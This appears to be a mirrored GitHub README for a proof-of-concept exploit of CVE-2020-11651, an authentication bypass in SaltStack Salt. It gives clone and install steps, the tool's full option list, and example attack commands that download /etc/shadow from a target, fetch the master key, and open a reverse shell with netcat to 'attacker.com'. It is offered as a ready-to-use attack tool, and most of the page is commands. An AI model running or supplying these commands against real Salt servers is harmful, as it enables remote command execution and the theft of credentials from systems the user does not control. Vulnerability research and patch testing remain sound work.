Giter Site home page Giter Site logo

cve-2020-11652's Introduction

CVE-2020-11651

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

Details

Install

git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

Usage

$ ./PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Command to execute. Defaul: /bin/sh
  --upload src dest, -u src dest
                        Upload a file
  --download src dest, -d src dest
                        Download a file
  --minions             Send command to all minions on master
  --quiet, -q           Enable quiet/silent mode
  --fetch-key-only      Only fetch the key

Example

Download a File

./PoC.py --host target.com --download /etc/shadow ./shadow

Run Reverse Shell

./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/bash\""

Fetch The Key

./PoC.py --host target.com --fetch-key-only

cve-2020-11652's People

Contributors

0xc0d avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.